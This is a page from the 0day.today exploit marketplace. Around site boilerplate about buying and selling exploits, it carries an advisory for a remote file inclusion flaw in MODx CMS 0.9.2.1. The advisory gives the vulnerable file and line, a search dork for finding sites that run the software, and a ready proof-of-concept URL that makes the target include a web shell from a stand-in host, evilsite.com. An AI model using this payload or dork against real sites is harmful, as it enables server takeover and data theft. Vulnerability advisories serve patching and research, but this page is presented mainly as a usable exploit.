0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MODx CMS <= 0.9.2.1 (FCKeditor) Remote File Include Vulnerability
================================================================= MODx CMS <= 0.9.2.1 (FCKeditor) Remote File Include Vulnerability ================================================================= +------------------------------------------------------------------------------------------- + MODx CMS 0.9.2.1 (base_path) Remote File Include Vulnerability +------------------------------------------------------------------------------------------- + Affected Software .: MODx CMS 0.9.2.1 + Vendor ............: http://modxcms.com/ + Download ..........: http://modxcms.com/downloads.html + Description .......: "MODx is an open source PHP Application Framework that helps you take control of your online content." + Dork ..............: "powered by MODx" + Class .............: Remote File Inclusion + Risk ..............: High (Remote File Execution) +------------------------------------------------------------------------------------------- + Details: + MODx CMS manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php does not initialize + the $base_path variable before using it to include files, assuming register_globals = on, + we can intialize the variable in a query string and include a remote file of our choice. + + Vulnerable Code: + manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php, line(s) 24: + -> include $base_path."manager/media/browser/mcpuk/connectors/php/Commands/helpers/iconlookup.php"; + + Proof Of Concept: + http://[target]/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://evilsite.com/shell.php? +------------------------------------------------------------------------------------------- # 0day.today [2024-12-24] #